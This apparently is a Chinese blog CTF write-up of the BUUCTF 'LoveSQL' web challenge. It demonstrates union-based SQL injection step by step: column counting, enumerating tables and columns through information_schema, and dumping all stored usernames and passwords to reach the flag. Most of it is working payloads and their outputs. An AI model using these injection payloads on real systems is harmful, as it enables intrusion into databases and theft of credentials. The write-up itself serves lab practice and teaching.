首页 > 数据库 >[BUUCTF][Web][极客大挑战 2019]LoveSQL 1

[BUUCTF][Web][极客大挑战 2019]LoveSQL 1

时间:2022-12-11 17:22:57浏览次数:64  
标签:Web BUUCTF LoveSQL fu union 123 l0ve1ysq1 password select

打开靶机url,页面显示有两个输入框,框中输入123',发现两个框都有sql注入问题
爆出一下错误
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123''' at line 1
尝试以下注入,爆出数据库名称
123'; database() #

返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database() #'' at line 1

说明不能使用堆叠注入这么搞

尝试union注入
123' union select 1 #

返回

The used SELECT statements have a different number of columns
说明有戏!继续增加select字段常数的个数,最后到这个时返回正常
123' union select 1,2,3 #

返回

Login Success!

Hello 2!
Your password is '3'

说明展示的是查询的第二个字段和和第三个字段

构造sql
123' union select 1,database(),3 #

返回

Hello geek!

Your password is '3'

成功之道数据库叫 geek

再次构造sql查出表名
# 这里写不行,3 放到最后会爆语法错误
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3 #
# 这样写ok,把子查询放到最后
123' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() #

返回

Hello 2!

Your password is 'geekuser,l0ve1ysq1'
推测flag内容在l0ve1ysq1,开始爆该表的字段
123' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

返回

Hello 2!
Your password is 'id,username,password'
有了表名和列名,就可以尝试把数据查出来,构造sql
123' union select id,username,password from l0ve1ysq1 limit 1 #
123' union select id,username,password from l0ve1ysq1 limit 2,1 #

返回

Hello cl4y!

Your password is 'wo_tai_nan_le'

说明这么搞ok

换种快速的方式
# 这样也ok,但是有点慢
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
# 这样更ok,快一点
123' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

返回

Hello 2!

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}'
boom 获得flag flag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}

标签:Web,BUUCTF,LoveSQL,fu,union,123,l0ve1ysq1,password,select
From: https://www.cnblogs.com/gradyblog/p/16973923.html

相关文章

  • IDEA创建Java Web项目
    ✅作者简介:热爱国学的Java后端开发者,修心和技术同步精进。......
  • Web电子表格插件、在线Excel插件、在线Spreadsheet插件、大量数据行-百万数据行插件、
    实现在线表格的方式有:1、以HTML的Table元素实现,主要靠虚拟渲染优化性能,体验较差,插件却很多。2、以HTML的Canvas绘图实现,得益于Canvas的高性能,体验可以优化到极致,但绘图相......
  • Selenium3自动化测试实战--第4章 WebDriver API 3--定位一组元素,多表单切换,多窗口切换
    4.8定位一组元素书中是elements=find_elements_by_id()官网是elements=find_elements(By.ID,'')然后for循环 foreinelements:4.9多表单切换web应用中经常......
  • [BUUCTF][Web][极客大挑战 2019]Secret File 1
    打开靶机对应的url右键查看网页源代码,查看到一个访问路径/Archive_room.php构造url访问一下http://3bfaebad-fdfa-4226-ae0a-551f0228becb.node4.buuoj.cn:81/Archive_......
  • websocket协议详解
    概念介绍①单工通信:数据传输只允许在一个方向上传输,只能一方发送数据,另一方接收数据并发送。②半双工:数据传输允许两个方向上的传输,但在同一时间内,只可以有一方发送或接收数......
  • .NET 6 的轻量级 Webapi 框架 FastEndpoints
    Github: https://github.com/FastEndpointsFastEndpoints(fast-endpoints.com)基于.NET6的轻量级Webapi框架FastEndpoints 大家好,我是等天黑。FastEndpoin......
  • C#中的WebAPI
    前端用:vue3,后端:net6,的结合代码vue3手动创建:勾选1、路由配置:router。2、vuex状态管理:store类似全局变量。3、在加上UI库:element-plus模板大致UI库模板如下:安装ui库命令:npmi......
  • BUUCTF之[BJDCTF2020]BJD hamburger competition (复现)
    一个老八把我整不会了,看其他师傅的wp才知道,这个是C#和unity开发的游戏,所以我们用dnspy进行反编译下面是复现过程看到是unity程序,上网查了相关参考,一般是用js或者c#进行......
  • webtest mobile + android apk test
    s常见的apk专项测试,主要有几类(主要指项目中经常用到的)1、稳定性2、安全性3、兼容性4、版本升级5、流量测试6、Crash问题(死机);7、设备兼容问题;8、流量占用率的问题;9、App在......
  • ASP.NET Web程序设计
    目录我的第一篇博客APP_Data放一些数据文件(整个网站数据信息)APP_Start项目启动配置文件Content放静态页面Scripts放js文件aspx文件就是窗体文件Default是首页......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99